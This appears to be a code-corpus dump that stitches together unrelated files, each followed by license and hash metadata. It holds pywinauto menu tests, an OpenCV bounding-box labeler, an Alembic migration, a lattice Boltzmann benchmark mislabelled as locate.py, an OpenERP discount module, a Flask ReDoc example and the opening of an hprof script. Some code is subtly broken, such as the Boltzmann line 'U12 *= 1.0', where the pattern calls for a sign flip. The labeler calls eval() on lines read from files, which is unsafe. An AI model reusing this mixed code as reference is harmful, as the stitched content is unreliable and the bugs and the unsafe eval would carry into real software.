# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for Menu"""
import sys
import os
import unittest
sys.path.append(".")
from pywinauto.application import Application
from pywinauto.sysinfo import is_x64_Python
from pywinauto.controls.menuwrapper import MenuItemNotEnabled
from pywinauto.timings import Timings
mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
class MenuWrapperTests(unittest.TestCase):
"Unit tests for the Menu and the MenuItem classes"
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.Defaults()
self.app = Application()
self.app.start("Notepad.exe")
self.dlg = self.app.Notepad
def tearDown(self):
"Close the application after tests"
self.app.kill_()
def testInvalidHandle(self):
"Test that an exception is raised with an invalid menu handle"
# self.assertRaises(InvalidWindowHandle, HwndWrapper, -1)
pass
def testItemCount(self):
self.assertEqual(5, self.dlg.Menu().ItemCount())
def testItem(self):
self.assertEqual(u'&File', self.dlg.Menu().Item(0).Text())
self.assertEqual(u'&File', self.dlg.Menu().Item(u'File').Text())
self.assertEqual(u'&File', self.dlg.Menu().Item(u'&File', exact=True).Text())
def testItems(self):
self.assertEqual([u'&File', u'&Edit', u'F&ormat', u'&View', u'&Help'],
[item.Text() for item in self.dlg.Menu().Items()])
def testFriendlyClassName(self):
self.assertEqual('MenuItem', self.dlg.Menu().Item(0).friendly_class_name())
def testMenuItemNotEnabled(self):
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuSelect, 'Edit->Find Next')
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuItem('Edit->Find Next').Click)
self.assertRaises(MenuItemNotEnabled, self.dlg.MenuItem('Edit->Find Next').click_input)
def testGetProperties(self):
self.assertEqual(
{u'menu_items':
[{u'index': 0, u'state': 0, u'item_type': 0, u'item_id': 64, u'text': u'View &Help'},
{u'index': 1, u'state': 3, u'item_type': 2048, u'item_id': 0, u'text': u''},
{u'index': 2, u'state': 0, u'item_type': 0, u'item_id': 65, u'text': u'&About Notepad'}]},
self.dlg.Menu().GetMenuPath('Help')[0].SubMenu().GetProperties())
def testGetMenuPath(self):
# print('id = ' + str(self.dlg.Menu().GetMenuPath('Help->#3')[0].id()))
self.assertEqual(u'&About Notepad', self.dlg.Menu().GetMenuPath(' Help -> #2 ')[-1].Text())
self.assertEqual(u'&About Notepad', self.dlg.Menu().GetMenuPath('Help->$65')[-1].Text())
self.assertEqual(u'&About Notepad',
self.dlg.Menu().GetMenuPath('&Help->&About Notepad', exact=True)[-1].Text())
self.assertRaises(IndexError, self.dlg.Menu().GetMenuPath, '&Help->About what?', exact=True)
def test__repr__(self):
print(self.dlg.Menu())
print(self.dlg.Menu().GetMenuPath('&Help->&About Notepad', exact=True)[-1])
def testClick(self):
self.dlg.Menu().GetMenuPath('&Help->&About Notepad')[-1].Click()
About = self.app.Window_(title='About Notepad')
About.Wait('ready')
About.OK.Click()
About.WaitNot('visible')
def testClickInput(self):
self.dlg.Menu().GetMenuPath('&Help->&About Notepad')[-1].click_input()
About = self.app.Window_(title='About Notepad')
About.Wait('ready')
About.OK.Click()
About.WaitNot('visible')
class OwnerDrawnMenuTests(unittest.TestCase):
"""Unit tests for the OWNERDRAW menu items"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.Defaults()
self.app = Application().Start(os.path.join(mfc_samples_folder, u"BCDialogMenu.exe"))
self.dlg = self.app.BCDialogMenu
self.app.wait_cpu_usage_lower(threshold=1.5, timeout=30, usage_interval=1)
self.dlg.wait('ready')
def tearDown(self):
"""Close the application after tests"""
self.app.kill_()
def testCorrectText(self):
menu = self.dlg.Menu()
self.assertEqual(u'&New', menu.GetMenuPath('&File->#0')[-1].Text()[:4])
self.assertEqual(u'&Open...', menu.GetMenuPath('&File->#1')[-1].Text()[:8])
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -1,208,418,087,928,953,300 | 40.666667 | 107 | 0.66672 | false |
frombeijingwithlove/dlcv_for_beginners | chap6/bbox_labeling/bbox_labeling.py | 1 | 7575 | import os
import cv2
from tkFileDialog import askdirectory
from tkMessageBox import askyesno
WINDOW_NAME = 'Simple Bounding Box Labeling Tool'
FPS = 24
SUPPOTED_FORMATS = ['jpg', 'jpeg', 'png']
DEFAULT_COLOR = {'Object': (255, 0, 0)}
COLOR_GRAY = (192, 192, 192)
BAR_HEIGHT = 16
KEY_UP = 65362
KEY_DOWN = 65364
KEY_LEFT = 65361
KEY_RIGHT = 65363
KEY_ESC = 27
KEY_DELETE = 65535
KEY_EMPTY = 0
get_bbox_name = '{}.bbox'.format
class SimpleBBoxLabeling:
def __init__(self, data_dir, fps=FPS, window_name=None):
self._data_dir = data_dir
self.fps = fps
self.window_name = window_name if window_name else WINDOW_NAME
self._pt0 = None
self._pt1 = None
self._drawing = False
self._cur_label = None
self._bboxes = []
label_path = '{}.labels'.format(self._data_dir)
self.label_colors = DEFAULT_COLOR if not os.path.exists(label_path) else self.load_labels(label_path)
imagefiles = [x for x in os.listdir(self._data_dir) if x[x.rfind('.') + 1:].lower() in SUPPOTED_FORMATS]
labeled = [x for x in imagefiles if os.path.exists(get_bbox_name(x))]
to_be_labeled = [x for x in imagefiles if x not in labeled]
self._filelist = labeled + to_be_labeled
self._index = len(labeled)
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
def _mouse_ops(self, event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
self._drawing = True
self._pt0 = (x, y)
elif event == cv2.EVENT_LBUTTONUP:
self._drawing = False
self._pt1 = (x, y)
self._bboxes.append((self._cur_label, (self._pt0, self._pt1)))
elif event == cv2.EVENT_MOUSEMOVE:
self._pt1 = (x, y)
elif event == cv2.EVENT_RBUTTONUP:
if self._bboxes:
self._bboxes.pop()
def _clean_bbox(self):
self._pt0 = None
self._pt1 = None
self._drawing = False
self._bboxes = []
def _draw_bbox(self, img):
h, w = img.shape[:2]
canvas = cv2.copyMakeBorder(img, 0, BAR_HEIGHT, 0, 0, cv2.BORDER_CONSTANT, value=COLOR_GRAY)
label_msg = '{}: {}, {}'.format(self._cur_label, self._pt0, self._pt1) \
if self._drawing \
else 'Current label: {}'.format(self._cur_label)
msg = '{}/{}: {} | {}'.format(self._index + 1, len(self._filelist), self._filelist[self._index], label_msg)
cv2.putText(canvas, msg, (1, h+12),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 0), 1)
for label, (bpt0, bpt1) in self._bboxes:
label_color = self.label_colors[label] if label in self.label_colors else COLOR_GRAY
cv2.rectangle(canvas, bpt0, bpt1, label_color, thickness=2)
cv2.putText(canvas, label, (bpt0[0]+3, bpt0[1]+15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
if self._drawing:
label_color = self.label_colors[self._cur_label] if self._cur_label in self.label_colors else COLOR_GRAY
if self._pt1[0] >= self._pt0[0] and self._pt1[1] >= self._pt0[1]:
cv2.rectangle(canvas, self._pt0, self._pt1, label_color, thickness=2)
cv2.putText(canvas, self._cur_label, (self._pt0[0] + 3, self._pt0[1] + 15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
return canvas
@staticmethod
def export_bbox(filepath, bboxes):
if bboxes:
with open(filepath, 'w') as f:
for bbox in bboxes:
line = repr(bbox) + '\n'
f.write(line)
elif os.path.exists(filepath):
os.remove(filepath)
@staticmethod
def load_bbox(filepath):
bboxes = []
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
bboxes.append(eval(line))
line = f.readline().rstrip()
return bboxes
@staticmethod
def load_labels(filepath):
label_colors = {}
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
label, color = eval(line)
label_colors[label] = color
line = f.readline().rstrip()
return label_colors
@staticmethod
def load_sample(filepath):
img = cv2.imread(filepath)
bbox_filepath = get_bbox_name(filepath)
bboxes = []
if os.path.exists(bbox_filepath):
bboxes = SimpleBBoxLabeling.load_bbox(bbox_filepath)
return img, bboxes
def _export_n_clean_bbox(self):
bbox_filepath = os.sep.join([self._data_dir, get_bbox_name(self._filelist[self._index])])
self.export_bbox(bbox_filepath, self._bboxes)
self._clean_bbox()
def _delete_current_sample(self):
filename = self._filelist[self._index]
filepath = os.sep.join([self._data_dir, filename])
if os.path.exists(filepath):
os.remove(filepath)
filepath = get_bbox_name(filepath)
if os.path.exists(filepath):
os.remove(filepath)
self._filelist.pop(self._index)
print('{} is deleted!'.format(filename))
def start(self):
last_filename = ''
label_index = 0
labels = self.label_colors.keys()
n_labels = len(labels)
cv2.namedWindow(self.window_name)
cv2.setMouseCallback(self.window_name, self._mouse_ops)
key = KEY_EMPTY
delay = int(1000 / FPS)
while key != KEY_ESC:
if key == KEY_UP:
if label_index == 0:
pass
else:
label_index -= 1
elif key == KEY_DOWN:
if label_index == n_labels - 1:
pass
else:
label_index += 1
elif key == KEY_LEFT:
if self._index > 0:
self._export_n_clean_bbox()
self._index -= 1
if self._index < 0:
self._index = 0
elif key == KEY_RIGHT:
if self._index < len(self._filelist) - 1:
self._export_n_clean_bbox()
self._index += 1
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
elif key == KEY_DELETE:
if askyesno('Delete Sample', 'Are you sure?'):
self._delete_current_sample()
key = KEY_EMPTY
continue
filename = self._filelist[self._index]
if filename != last_filename:
filepath = os.sep.join([self._data_dir, filename])
img, self._bboxes = self.load_sample(filepath)
self._cur_label = labels[label_index]
canvas = self._draw_bbox(img)
cv2.imshow(self.window_name, canvas)
key = cv2.waitKey(delay)
last_filename = filename
print('Finished!')
cv2.destroyAllWindows()
self.export_bbox(os.sep.join([self._data_dir, get_bbox_name(filename)]), self._bboxes)
print('Labels updated!')
if __name__ == '__main__':
dir_with_images = askdirectory(title='Where are the images?')
labeling_task = SimpleBBoxLabeling(dir_with_images)
labeling_task.start()
| bsd-3-clause | 2,674,751,870,218,334,700 | 32.223684 | 116 | 0.532937 | false |
teampopong/pokr.kr | alembic/versions/3e683fc1af11_region_id_field_of_meetings_table.py | 1 | 1559 | # -*- coding: utf-8 -*-
"""region_id field of 'meetings' table
Revision ID: 3e683fc1af11
Revises: 2f08fb65fe0b
Create Date: 2014-05-24 21:31:25.378918
"""
from __future__ import unicode_literals
# revision identifiers, used by Alembic.
revision = '3e683fc1af11'
down_revision = '2f08fb65fe0b'
from alembic import op
from sqlalchemy.sql import table, column
import sqlalchemy as sa
region = table('region',
column('id', sa.String(16)),
column('name', sa.Unicode(20)),
column('name_en', sa.String(80)),
)
def upgrade():
op.alter_column('meeting', 'id', type_=sa.BigInteger, autoincrement=False)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.BigInteger)
op.alter_column('statement', 'meeting_id', type_=sa.BigInteger)
op.add_column('meeting', sa.Column('region_id', sa.String(length=16)))
op.create_index(op.f('ix_meeting_region_id'), 'meeting', ['region_id'], unique=False)
op.execute(
region.insert()\
.values({
'id': '0',
'name': '대한민국',
'name_en': 'national',
})
)
def downgrade():
op.alter_column('meeting', 'id', type_=sa.Integer, autoincrement=True)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.Integer)
op.alter_column('statement', 'meeting_id', type_=sa.Integer)
op.drop_index(op.f('ix_meeting_region_id'), table_name='meeting')
op.drop_column('meeting', 'region_id')
op.execute(
region.delete()\
.where(region.c.id == '0')
)
| apache-2.0 | -873,324,810,509,578,100 | 27.722222 | 89 | 0.620245 | false |
Ektorus/bohrium | ve/cpu/tools/locate.py | 1 | 8762 | from __future__ import print_function
## 3D Lattice Boltzmann (BGK) model of a fluid.
## D3Q19 model. At each timestep, particle densities propagate
## outwards in the directions indicated in the figure. An
## equivalent 'equilibrium' density is found, and the densities
## relax towards that state, in a proportion governed by omega.
## Iain Haslam, March 2006.
import util
if util.Benchmark().bohrium:
import bohrium as np
else:
import numpy as np
def main():
B = util.Benchmark()
nx = B.size[0]
ny = B.size[1]
nz = B.size[2]
ITER = B.size[3]
NO_OBST = 1
omega = 1.0
density = 1.0
deltaU = 1e-7
t1 = 1/3.0
t2 = 1/18.0
t3 = 1/36.0
B.start()
F = np.ones((19, nx, ny, nz), dtype=np.float64)
F[:] = density/19.0
FEQ = np.ones((19, nx, ny, nz), dtype=np.float64)
FEQ[:] = density/19.0
T = np.zeros((19, nx, ny, nz), dtype=np.float64)
#Create the scenery.
BOUND = np.zeros((nx, ny, nz), dtype=np.float64)
BOUNDi = np.ones((nx, ny, nz), dtype=np.float64)
"""
if not NO_OBST:
for i in xrange(nx):
for j in xrange(ny):
for k in xrange(nz):
if ((i-4)**2+(j-5)**2+(k-6)**2) < 6:
BOUND[i,j,k] += 1.0
BOUNDi[i,j,k] += 0.0
BOUND[:,0,:] += 1.0
BOUNDi[:,0,:] *= 0.0
"""
if util.Benchmark().bohrium:
np.flush()
for ts in xrange(0, ITER):
##Propagate / Streaming step
T[:] = F
#nearest-neighbours
F[1,:,:,0] = T[1,:,:,-1]
F[1,:,:,1:] = T[1,:,:,:-1]
F[2,:,:,:-1] = T[2,:,:,1:]
F[2,:,:,-1] = T[2,:,:,0]
F[3,:,0,:] = T[3,:,-1,:]
F[3,:,1:,:] = T[3,:,:-1,:]
F[4,:,:-1,:] = T[4,:,1:,:]
F[4,:,-1,:] = T[4,:,0,:]
F[5,0,:,:] = T[5,-1,:,:]
F[5,1:,:,:] = T[5,:-1,:,:]
F[6,:-1,:,:] = T[6,1:,:,:]
F[6,-1,:,:] = T[6,0,:,:]
#next-nearest neighbours
F[7,0 ,0 ,:] = T[7,-1 , -1,:]
F[7,0 ,1:,:] = T[7,-1 ,:-1,:]
F[7,1:,0 ,:] = T[7,:-1, -1,:]
F[7,1:,1:,:] = T[7,:-1,:-1,:]
F[8,0 ,:-1,:] = T[8,-1 ,1:,:]
F[8,0 , -1,:] = T[8,-1 ,0 ,:]
F[8,1:,:-1,:] = T[8,:-1,1:,:]
F[8,1:, -1,:] = T[8,:-1,0 ,:]
F[9,:-1,0 ,:] = T[9,1:, -1,:]
F[9,:-1,1:,:] = T[9,1:,:-1,:]
F[9,-1 ,0 ,:] = T[9,0 , 0,:]
F[9,-1 ,1:,:] = T[9,0 ,:-1,:]
F[10,:-1,:-1,:] = T[10,1:,1:,:]
F[10,:-1, -1,:] = T[10,1:,0 ,:]
F[10,-1 ,:-1,:] = T[10,0 ,1:,:]
F[10,-1 , -1,:] = T[10,0 ,0 ,:]
F[11,0 ,:,0 ] = T[11,0 ,:, -1]
F[11,0 ,:,1:] = T[11,0 ,:,:-1]
F[11,1:,:,0 ] = T[11,:-1,:, -1]
F[11,1:,:,1:] = T[11,:-1,:,:-1]
F[12,0 ,:,:-1] = T[12, -1,:,1:]
F[12,0 ,:, -1] = T[12, -1,:,0 ]
F[12,1:,:,:-1] = T[12,:-1,:,1:]
F[12,1:,:, -1] = T[12,:-1,:,0 ]
F[13,:-1,:,0 ] = T[13,1:,:, -1]
F[13,:-1,:,1:] = T[13,1:,:,:-1]
F[13, -1,:,0 ] = T[13,0 ,:, -1]
F[13, -1,:,1:] = T[13,0 ,:,:-1]
F[14,:-1,:,:-1] = T[14,1:,:,1:]
F[14,:-1,:, -1] = T[14,1:,:,0 ]
F[14,-1 ,:,:-1] = T[14,0 ,:,1:]
F[14,-1 ,:, -1] = T[14,0 ,:,0 ]
F[15,:,0 ,0 ] = T[15,:, -1, -1]
F[15,:,0 ,1:] = T[15,:, -1,:-1]
F[15,:,1:,0 ] = T[15,:,:-1, -1]
F[15,:,1:,1:] = T[15,:,:-1,:-1]
F[16,:,0 ,:-1] = T[16,:, -1,1:]
F[16,:,0 , -1] = T[16,:, -1,0 ]
F[16,:,1:,:-1] = T[16,:,:-1,1:]
F[16,:,1:, -1] = T[16,:,:-1,0 ]
F[17,:,:-1,0 ] = T[17,:,1:, -1]
F[17,:,:-1,1:] = T[17,:,1:,:-1]
F[17,:, -1,0 ] = T[17,:,0 , -1]
F[17,:, -1,1:] = T[17,:,0 ,:-1]
F[18,:,:-1,:-1] = T[18,:,1:,1:]
F[18,:,:-1, -1] = T[18,:,1:,0 ]
F[18,:,-1 ,:-1] = T[18,:,0 ,1:]
F[18,:,-1 , -1] = T[18,:,0 ,0 ]
#Densities bouncing back at next timestep
BB = np.empty(F.shape)
T[:] = F
T[1:,:,:,:] *= BOUND[np.newaxis,:,:,:]
BB[2 ,:,:,:] += T[1 ,:,:,:]
BB[1 ,:,:,:] += T[2 ,:,:,:]
BB[4 ,:,:,:] += T[3 ,:,:,:]
BB[3 ,:,:,:] += T[4 ,:,:,:]
BB[6 ,:,:,:] += T[5 ,:,:,:]
BB[5 ,:,:,:] += T[6 ,:,:,:]
BB[10,:,:,:] += T[7 ,:,:,:]
BB[9 ,:,:,:] += T[8 ,:,:,:]
BB[8 ,:,:,:] += T[9 ,:,:,:]
BB[7 ,:,:,:] += T[10,:,:,:]
BB[14,:,:,:] += T[11,:,:,:]
BB[13,:,:,:] += T[12,:,:,:]
BB[12,:,:,:] += T[13,:,:,:]
BB[11,:,:,:] += T[14,:,:,:]
BB[18,:,:,:] += T[15,:,:,:]
BB[17,:,:,:] += T[16,:,:,:]
BB[16,:,:,:] += T[17,:,:,:]
BB[15,:,:,:] += T[18,:,:,:]
# Relax calculate equilibrium state (FEQ) with equivalent speed and density to F
DENSITY = np.add.reduce(F)
#UX = F[5,:,:,:].copy()
UX = np.ones(F[5,:,:,:].shape, dtype=np.float64)
UX[:,:,:] = F[5,:,:,:]
UX += F[7,:,:,:]
UX += F[8,:,:,:]
UX += F[11,:,:,:]
UX += F[12,:,:,:]
UX -= F[6,:,:,:]
UX -= F[9,:,:,:]
UX -= F[10,:,:,:]
UX -= F[13,:,:,:]
UX -= F[14,:,:,:]
UX /=DENSITY
#UY = F[3,:,:,:].copy()
UY = np.ones(F[3,:,:,:].shape, dtype=np.float64)
UY[:,:,:] = F[3,:,:,:]
UY += F[7,:,:,:]
UY += F[9,:,:,:]
UY += F[15,:,:,:]
UY += F[16,:,:,:]
UY -= F[4,:,:,:]
UY -= F[8,:,:,:]
UY -= F[10,:,:,:]
UY -= F[17,:,:,:]
UY -= F[18,:,:,:]
UY /=DENSITY
#UZ = F[1,:,:,:].copy()
UZ = np.ones(F[1,:,:,:].shape, dtype=np.float64)
UZ[:,:,:] = F[1,:,:,:]
UZ += F[11,:,:,:]
UZ += F[13,:,:,:]
UZ += F[15,:,:,:]
UZ += F[17,:,:,:]
UZ -= F[2,:,:,:]
UZ -= F[12,:,:,:]
UZ -= F[14,:,:,:]
UZ -= F[16,:,:,:]
UZ -= F[18,:,:,:]
UZ /=DENSITY
UX[0,:,:] += deltaU #Increase inlet pressure
#Set bourderies to zero.
UX[:,:,:] *= BOUNDi
UY[:,:,:] *= BOUNDi
UZ[:,:,:] *= BOUNDi
DENSITY[:,:,:] *= BOUNDi
U_SQU = UX**2 + UY**2 + UZ**2
# Calculate equilibrium distribution: stationary
FEQ[0,:,:,:] = (t1*DENSITY)*(1.0-3.0*U_SQU/2.0)
# nearest-neighbours
T1 = 3.0/2.0*U_SQU
tDENSITY = t2*DENSITY
FEQ[1,:,:,:]=tDENSITY*(1.0 + 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[2,:,:,:]=tDENSITY*(1.0 - 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[3,:,:,:]=tDENSITY*(1.0 + 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[4,:,:,:]=tDENSITY*(1.0 - 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[5,:,:,:]=tDENSITY*(1.0 + 3.0*UX + 9.0/2.0*UX**2 - T1)
FEQ[6,:,:,:]=tDENSITY*(1.0 - 3.0*UX + 9.0/2.0*UX**2 - T1)
# next-nearest neighbours
T1 = 3.0*U_SQU/2.0
tDENSITY = t3*DENSITY
U8 = UX+UY
FEQ[7,:,:,:] =tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U9 = UX-UY
FEQ[8,:,:,:] =tDENSITY*(1.0 + 3.0*U9 + 9.0/2.0*(U9)**2 - T1)
U10 = -UX+UY
FEQ[9,:,:,:] =tDENSITY*(1.0 + 3.0*U10 + 9.0/2.0*(U10)**2 - T1)
U8 *= -1.0
FEQ[10,:,:,:]=tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U12 = UX+UZ
FEQ[11,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U12 *= 1.0
FEQ[14,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U13 = UX-UZ
FEQ[12,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U13 *= -1.0
FEQ[13,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U16 = UY+UZ
FEQ[15,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
U17 = UY-UZ
FEQ[16,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U17 *= -1.0
FEQ[17,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U16 *= -1.0
FEQ[18,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
F *= (1.0-omega)
F += omega * FEQ
#Densities bouncing back at next timestep
F[1:,:,:,:] *= BOUNDi[np.newaxis,:,:,:]
F[1:,:,:,:] += BB[1:,:,:,:]
del BB
del T1
del UX, UY, UZ
del U_SQU
del DENSITY, tDENSITY
del U8, U9, U10, U12, U13, U16, U17
if util.Benchmark().bohrium:
np.flush()
B.stop()
B.pprint()
if B.outputfn:
B.tofile(B.outputfn, {'res': UX})
"""
import matplotlib.pyplot as plt
UX *= -1
plt.hold(True)
plt.quiver(UY[:,:,4],UX[:,:,4], pivot='middle')
plt.imshow(BOUND[:,:,4])
plt.show()
"""
if __name__ == "__main__":
main()
| lgpl-3.0 | -477,230,179,552,261,200 | 30.070922 | 88 | 0.351518 | false |
Micronaet/micronaet-mx | sale_discount/model/discount.py | 1 | 4156 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# Original module for stock.move from:
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
discount_type = [
('integrated', 'Integrate'),
('inline', 'Inline'),
('row', 'Different row'),
]
class ResPartner(orm.Model):
''' Extra elemtent for manage discount
'''
_inherit = 'res.partner'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Update discount depend on scale (or reset scale)
'''
res = {'value': {}}
try:
if mode == 'scale':
scale = discount_scale.split('+')
discount_scale_cleaned = ''
rate = 100.0
for i in scale:
i = float(i.strip().replace('%', '').replace(',', '.'))
rate -= rate * i / 100.0
discount_scale_cleaned += "%s%5.2f%s " % (
'+' if discount_scale_cleaned else '', i, '%')
res['value']['discount'] = 100.0 - rate
res['value']['discount_scale'] = discount_scale_cleaned
else: # 'discount':
pass #res['value']['discount_scale'] = False
except:
res['warning'] = {
'title': _('Discount error'),
'message': _('Scale value not correct!'),
}
return res
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=35),
'discount': fields.float('Discount', digits=(
16, 2), help='Automated calculate if scale is indicated'),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
class SaleOrderLine(orm.Model):
''' Add agent commission
'''
_inherit = 'sale.order.line'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Call onchange in partner
'''
return self.pool.get('res.partner').onchange_discount(cr, uid, ids,
discount_scale=discount_scale, discount=discount, mode=mode,
context=context)
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=15),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
| agpl-3.0 | 6,720,405,219,061,504,000 | 34.220339 | 79 | 0.568816 | false |
soulnothing/FlaskReDoc | example/exampleapplication.py | 1 | 3734 | import sys
import re
import json
from flask import current_app, render_template, render_template_string
from flask import Flask, jsonify
from threading import Thread
from flaskredoc import ReDoc
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
import os
"""
This is an example application is does not actually do anything really.
All responses are canned and sometimes randomize json structures. It is
meant to show the ease of documenting your application.
"""
resp_folder=os.path.join(os.getcwd(), 'responses')
app = Flask(__name__)
app.debug = True
@app.route('/')
def blah():
'''
The entry point function, that just prints a string.
Function with out much purpose, just returns a string.
* @CODE 200: A successful response.
* @RESPONSE: sample.txt, Example Successful Response, 200 OK
'''
return "This is an example application, please see the help section"
@app.route('/db/user/<username>')
@app.route('/db/user', defaults={"username": None})
def query_user(username):
"""
Returns a json structure containing user information.
Takes in a username as a parameter either as a GET paramater or in the
url structure. It retrieves basic information including the username,
group, user id, and location. Case of the user name does not matter,
as the provided user name is forced to lower case prior to querying.
* @RESPONSE: db-user-query.json, Example Successful response, 200 OK
* query: /db/users/bob
* description: Querying for the user bob and gathering user information.
* @RESPONSE: db-users-query-error.json, Example User Does not exist, 400 BAD Response
* query: /db/users/gizmo
* description: Querying a non existent user.
* @RESPONSE: db-users-query-no-param.json, Example Invalid Parameters, 400 BAD Response
* query: /db/users
* description: No username is specified in the query.
* @GROUP: Database, User Management
* @URL 1 username: Specify the username to retrieve from the database.
* @GET username: Specify the username to retrieve from the database.
* @CODE 200: Successful response
* @CODE 400: Bad response queried user does not exist, or no parameters provided.
"""
return "user query"
@app.route('/db/users')
def query_users():
"""
Returns a list of all users.
Queries the database and returns an array
of all valid user names from the database.
* @RESPONSE: db-query-users.json, Example Successful Response, 200 OK
* query: /db/users
* description: A query to list all users.
* @RESPONSE: db-query-users-location.json, Example Successful Location Response, 200 OK
* query: /db/users?location=Dallas
* description: Query the Dallas location for it's users.
* @RESPONSE: db-query-users-group.xml, Example Successful Group Response, 200 OK
* query: /db/users?group=it
* description: Query the group it for it's users. Due to antiquated systems this is in xml.
* @GET group: Specify the group, you wish to get a list of users for.
* @GET location: Specify the location you wish to get a list of users for.
* @CODE 200: A successful response.
"""
return "users"
if __name__ == "__main__":
doc = ReDoc(app=app, respfolder=os.path.join(os.getcwd(), 'responses'))
doc.doc_app()
frontend = doc.create_frontend()
frontend.debug = True
api = doc.create_help_api()
api.debug = True
application = DispatcherMiddleware(app, {'/help': frontend,
'/help/api': api
})
run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
| mit | 8,131,353,653,670,957,000 | 37.895833 | 99 | 0.697108 | false |
cykl/hprof2flamegraph | stackcollapse_hpl.py | 1 | 8006 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import struct
import collections
import sys
import re
Method = collections.namedtuple('Method', ['id', 'file_name', 'class_name', 'method_name'])
